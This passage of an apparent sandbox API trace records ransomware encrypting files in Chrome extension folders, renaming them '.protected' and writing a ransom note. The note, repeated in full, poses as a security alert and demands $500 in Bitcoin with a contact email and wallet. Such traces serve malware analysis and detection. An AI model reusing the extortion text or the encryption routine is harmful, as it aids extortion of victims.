lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.788] CloseHandle (hObject=0x168) returned 1 [0079.788] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.protected") returned 167 [0079.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.protected")) returned 1 [0079.789] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.789] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.789] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\RESTORE_FILES.txt") returned 161 [0079.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.789] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.789] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.790] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.790] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.790] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.790] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.790] CloseHandle (hObject=0x164) returned 1 [0079.790] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.790] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0079.790] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0079.790] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0079.790] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0079.790] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0079.790] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja") returned 143 [0079.790] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0079.790] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0079.790] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\*") returned 145 [0079.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.790] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.790] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.790] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.790] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.791] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.791] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\.") returned 145 [0079.791] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.791] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.791] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.791] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.791] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.791] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.791] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.791] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\..") returned 146 [0079.791] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.791] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.791] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.791] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.791] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.791] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.791] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.791] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.791] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json") returned 157 [0079.791] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.791] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.791] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.791] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json") returned 157 [0079.791] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json") returned 157 [0079.791] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json") returned 157 [0079.791] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.791] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.792] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.792] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.792] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.792] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.792] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.792] CloseHandle (hObject=0x168) returned 1 [0079.792] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.protected") returned 167 [0079.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.protected")) returned 1 [0079.793] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.793] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.793] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\RESTORE_FILES.txt") returned 161 [0079.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.793] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.793] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.794] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.794] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.794] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.794] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.794] CloseHandle (hObject=0x164) returned 1 [0079.794] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.794] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0079.794] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0079.794] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0079.794] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0079.794] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0079.794] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko") returned 143 [0079.794] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0079.794] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0079.795] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\*") returned 145 [0079.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.799] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.799] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.799] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.799] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.799] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.799] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\.") returned 145 [0079.799] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.799] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.799] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.799] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.799] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.799] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.799] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.799] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\..") returned 146 [0079.799] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.799] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.799] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.799] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.799] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.799] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.799] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.799] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.799] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json") returned 157 [0079.799] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.799] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.799] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.799] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json") returned 157 [0079.800] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json") returned 157 [0079.800] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json") returned 157 [0079.800] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.800] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.800] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.800] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.801] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.801] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.801] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.801] CloseHandle (hObject=0x168) returned 1 [0079.801] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 